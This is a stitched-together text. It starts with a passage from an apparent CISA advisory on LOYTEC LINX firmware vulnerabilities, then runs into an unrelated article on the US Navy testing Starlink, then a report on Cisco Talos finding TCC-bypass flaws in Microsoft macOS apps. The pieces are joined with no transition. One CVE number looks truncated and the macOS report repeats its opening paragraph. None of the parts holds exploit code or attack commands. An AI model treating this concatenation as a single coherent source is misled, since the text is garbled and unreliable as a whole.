LOYTEC electronics GmbH LINX-212 firmware 6.2.4 and LINX-151 firmware 7.2.4 are vulnerable to incorrect access control via dpal_config.zml file. This vulnerability allows remote attackers to disclose sensitive information on LOYTEC device data point configuration.
CVE-2023-46387 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2023-46387. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).
3.2.9 CLEARTEXT STORAGE OF SENSITIVE INFORMATION CWE-312
LOYTEC electronics GmbH LINX-212 6.2.4 and LINX-151 7.2.4 are vulnerable to insecure permissions via dpal_config.zml file. This vulnerability allows remote attackers to disclose smtp client account credentials and bypass email authentication.
CVE-2023-46388 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2023-46388. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:L/SI:L/SA:L).
3.2.10 IMPROPER ACCESS CONTROL CWE-284
LOYTEC electronics GmbH LINX-212 firmware 6.2.4 and LINX-151 firmware 7.2.4 are vulnerable to incorrect access control via registry.xml file. This vulnerability allows remote attackers to disclose sensitive information on LINX configuration.
CVE-2023-46389 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2023-46389. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).
3.3 BACKGROUND
CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: Austria
3.4 RESEARCHER
Chizuru Toyama of TXOne Networks reported these vulnerabilities to CISA.
4. MITIGATIONS
LOYTEC recommends users of the affected products to update to version 8.2.8. Additionally, LOYTEC recommends the following actions:
For CVE-2023-46380, CVE-2023-46382, CVE-2023-46383,CVE-2023-46385: Disable HTTP on the LOYTEC device as recomended by LOYTEC's security hardening guide.
For CVE-2023-4638: Upgrade to latest firmware. Permissions on LWEB projects have been hardened.
For CVE-2023-46387, CVE-2023-46389: Current firmware protects registry.xml and dpal_config.zml by admin access. Upgrade to latest firmware.
For CVE-2023-46384: Patch will be published in LINX Configurator.
For CVE-2023-46386, CVE-2023-46388: LINX firmware will implement encrypted storage of SMTP credentials. Patch will be published as LINX firmware upgrade.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
Locate control system networks and remote devices behind firewalls and isolating them from business networks.
When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:
Do not click web links or open attachments in unsolicited email messages.
Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
5. UPDATE HISTORY
September 3, 2024: Initial Publication

LOYTEC Electronics LINX Series

The Navy is testing out the Elon Musk–owned satellite constellation to provide high-speed internet access to sailors at sea. It’s part of a bigger project that’s about more than just getting online.

Life aboard a US Navy warship at sea can be stressful, boring, and lonely, with separation from friends and family and long stretches between port calls both isolating and monotonous. Now, Elon Musk is here to take the edge off.

In a now deleted press release from the Naval Information Warfare Systems Command (NAVWAR), the Navy recently announced that it is experimenting with bringing reliable and persistent high-speed internet to its surface warships. The connectivity comes via a new system developed under its Sailor Edge Afloat and Ashore (SEA2) initiative, which uses satellites from the Starlink network maintained by Musk’s SpaceX and other spaceborne broadband internet providers to maintain a constant and consistent internet connection for sailors—a system that NAVWAR says has “applications across the entire Navy.”

The US Defense Department has for decades relied on a network of aging satellites to furnish service members at sea with decidedly slow internet access, according to an updated release NAVWAR shared with WIRED. By contrast, commercial satellite constellations like Starlink and Eutelsat OneWeb, which number in the thousands and offer coverage from a significantly lower orbit, provide a far superior connection.

The resulting SEA2 system, dubbed the Satellite Terminal (transportable) Non-Geostationary (STtNG), allows a warship’s tactical feeds secure access to low-orbit satellites with a median connection speed of 30 to 50 megabits per second, according to NAVWAR. With the installation of additional Starlink antennas, the system can scale up to speeds of 1 gigabit per second.

NAVWAR said that it scrubbed its initial press release, which showed the installation of a Starlink terminal aboard the aircraft carrier USS _Abraham Lincoln_, from the Pentagon’s Defense Visual Information Distribution System (DVIDS) media portal to “address inaccuracies and ensure the information is correct,” Elisha Gamboa, a command spokesperson, told WIRED in a statement.

News of the Starlink terminal’s installation aboard the _Lincoln_ in particular came as the aircraft carrier and its associated battle group were redirected to the US Central Command area of operations in the Middle East amid increased tensions between Israel and Iran following the former’s targeted killing of a Hamas leader in Tehran.

The Navy has not yet disclosed how many surface warships have received Starlink terminals. Defense officials told DefenseScoop in April that the DOD was at the time evaluating the system aboard two deployed vessels “with aims to field those broadband-providing capabilities across a fleet of up to 200 in the future.”

Originally a “passion project” of _Lincoln_ combat systems officer Commander Kevin White, SEA2 systems were first installed aboard the next-generation aircraft carrier USS _Gerald R. Ford_ in February 2023, offering sailors the ability to quickly and easily communicate with loved ones back home no matter where they are in the world—a major boost to morale amid the doldrums of life at sea. The system even allowed hundreds of sailors to enjoy a live broadcast of Super Bowl LVIII through a normal TV streaming service aboard the warship this past year.

“Having the ability to reach out to friends or family allows our sailors the opportunity to decompress for a few minutes, and that in turn allows them to be able to operate more efficiently,” Richard Haninger, the _Ford_’s deployed resiliency educator, said following the installation of the SEA2 system aboard the carrier in February 2023. “It’s not just about reaching back to friends and family, the ability to pay a bill online, take an online class, or even just check the score of the game \[...\] all of this allows our Sailors the chance to access something that lowers their stress level, then return to work after a quick break more focused and able to complete the mission.”

But beyond morale-boosting applications, SEA2 also purportedly offers major benefits for “tactical and business applications” used by sailors on a daily basis, like, say, those used for air wing maintenance or for tracking pay and benefits. As White explained in a May release from the Navy on the initiative, most of these applications function at higher classification levels and are encrypted, but they’re still designed to operate on the commercial internet without jeopardizing information security.

“The fact that we’re not making use of that opportunity with modern technology to allow classified tactical applications to ride the commercial internet is where we are missing out, so we built \[SEA2\] to be able to do that in the future,” as White put it. “We’re close to demonstrating a couple of those applications, and I am fully confident it will be game changing.” (As of June, the Navy had not authorized the use of classified data with the system)

The Navy also expects to see broad “tangible warfighting impact” from the proliferation of SEA2 across the surface fleet, namely on “recruitment and retention, mental health, cloud services, and work stoppages due to slow and inaccessible websites,” as one service official told DefenseScoop in April.

The Navy isn’t the only service embracing Starlink to enable faster, persistent internet for deployed service members. The US Space Force signed a $70 million contract with Starlink parent company SpaceX in October 2023 to provide “a best effort and global subscription for various land, maritime, stationary and mobility platforms and users” using Starshield, the company’s name for its military products. The US Army currently remains reliant on Starlink, but the service has been casting about for fresh commercial satellite constellations to tap into for advanced command and control functions, according to Defense News. And SpaceX is actively building a network of “hundreds” of specialized Starshield spy satellites for the National Reconnaissance Office, Reuters reported earlier this year.

But Starlink is far from a perfect system, especially for potential military applications. According to a technical report obtained by The Debrief, Ukraine has claimed that Russia’s military intelligence agency has conducted “large-scale cyberattacks” to access data from the Starlink satellite constellations that have proven essential to the former’s military communications infrastructure since the start of the Russian invasion in 2022. Indeed, significant hardware vulnerabilities have imperiled Starlink terminals at the hands of experienced hackers, as WIRED has previously documented.

More importantly, there’s the matter of Musk’s ownership of Starlink. The controversial SpaceX founder had previously refused to allow Ukraine to use the satellite constellation to launch a surprise attack against Russian forces in Kremlin-controlled Crimea in September 2022, prompting concerns among Pentagon decisionmakers that a private citizen with a questionable perception of geopolitics could drastically shape US military operations during a future conflict simply by switching off service branches’ Starlink access, according to an Associated Press report last year.

“Living in the world we live in, in which Elon runs this company and it is a private business under his control, we are living off his good graces,” a Pentagon official told The New Yorker in August 2023. “That sucks.”

In a post on X responding to this article following publication, Musk asserted that “Starlink was barred from turning on satellite beams in Crimea at the time, because doing so would violate US sanctions against Russia!”

“We received an unexpected request in the middle of the night to activate Starlink in Crimea in a matter of a few hours from the Ukraine government, but received no request or permission to override sanctions from the US government,” Musk added. “Had we done as Ukraine asked, it would have been a felony violation of US law.”

Musk previously said that enabling Ukraine to use Starlink to launch its attack would make SpaceX “explicitly complicit in a major act of war and conflict escalation.”

Given these potential risks, it’s unlikely that Starlink will see deeper integration into the major tactical systems that govern the operation of a Navy warship at sea. But for the moment, it looks as though sailors will at least get a welcome reprieve from the stress and solitude of life on the high seas.

_Update 1:50 pm ET, September 3, 2024: Added comments from Elon Musk in response to this article's characterization of Starlink's refusal to enable its service for the Ukrainian military._

The US Navy Is Going All In on Starlink

Eight vulnerabilities have been uncovered in Microsoft applications for macOS that an adversary could exploit to gain elevated privileges or access sensitive data by circumventing the operating system's permissions-based model, which revolves around the Transparency, Consent, and Control (TCC) framework.
"If successful, the adversary could gain any privileges already granted to the affected

Eight vulnerabilities have been uncovered in Microsoft applications for macOS that an adversary could exploit to gain elevated privileges or access sensitive data by circumventing the operating system's permissions-based model, which revolves around the Transparency, Consent, and Control (TCC) framework.

"If successful, the adversary could gain any privileges already granted to the affected Microsoft applications," Cisco Talos said. "For example, the attacker could send emails from the user account without the user noticing, record audio clips, take pictures, or record videos without any user interaction."

The shortcomings span various applications such as Outlook, Teams, Word, Excel PowerPoint, and OneNote.

The cybersecurity company said malicious libraries could be injected into these applications and gain their entitlements and user-granted permissions, which could then be weaponized for extracting sensitive information depending on the access granted to each of those apps.

TCC is a framework developed by Apple to manage access to sensitive user data on macOS, giving users added transparency into how their data is accessed and used by different applications installed on the machine.

This is maintained in the form of an encrypted database that records the permissions granted by the user to each application so as to ensure that the preferences are consistently enforced across the system.

"TCC works in conjunction with the application sandboxing feature in macOS and iOS," Huntress notes in its explainer for TCC. "Sandboxing restricts an app's access to the system and other applications, adding an extra layer of security. TCC ensures that apps can only access data for which they have received explicit user consent."

Sandboxing is also a countermeasure that guards against code injection, which enables attackers with access to a machine to insert malicious code into legitimate processes and access protected data.

"Library injection, also known as Dylib Hijacking in the context of macOS, is a technique whereby code is inserted into the running process of an application," Talos researcher Francesco Benvenuto said. "macOS counters this threat with features such as hardened runtime, which reduce the likelihood of an attacker executing arbitrary code through the process of another app."

"However, should an attacker manage to inject a library into the process space of a running application, that library could use all the permissions already granted to the process, effectively operating on behalf of the application itself."

It however bears noting that attacks of this kind require the threat actor to already have a certain level of access to the compromised host so that it could be abused to open a more privileged app and inject a malicious library, essentially granting them the permissions associated with the exploited app.

In other words, should a trusted application be infiltrated by an attacker, it could be leveraged to abuse its permissions and gain unwarranted access to sensitive information without users' consent or knowledge.

This sort of breach could occur when an application loads libraries from locations the attacker could potentially manipulate and it has disabled library validation through a risky entitlement (i.e., set to true), which otherwise limits the loading of libraries to those signed by the application's developer or Apple.

"macOS trusts applications to self-police their permissions," Benvenuto noted. "A failure in this responsibility leads to a breach of the entire permission model, with applications inadvertently acting as proxies for unauthorized actions, circumventing TCC and compromising the system's security model."

Microsoft, for its part, considers the identified issues as "low risk" and that the apps are required to load unsigned libraries to support plugins. However, the company has stepped in to remediate the problem in its OneNote and Teams apps.

"The vulnerable apps leave the door open for adversaries to exploit all of the apps' entitlements and, without any user prompts, reuse all the permissions already granted to the app, effectively serving as a permission broker for the attacker," Benvenuto said.

"It's also important to mention that it's unclear how to securely handle such plug-ins within macOS' current framework. Notarization of third-party plug-ins is an option, albeit a complex one, and it would require Microsoft or Apple to sign third-party modules after verifying their security."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#auth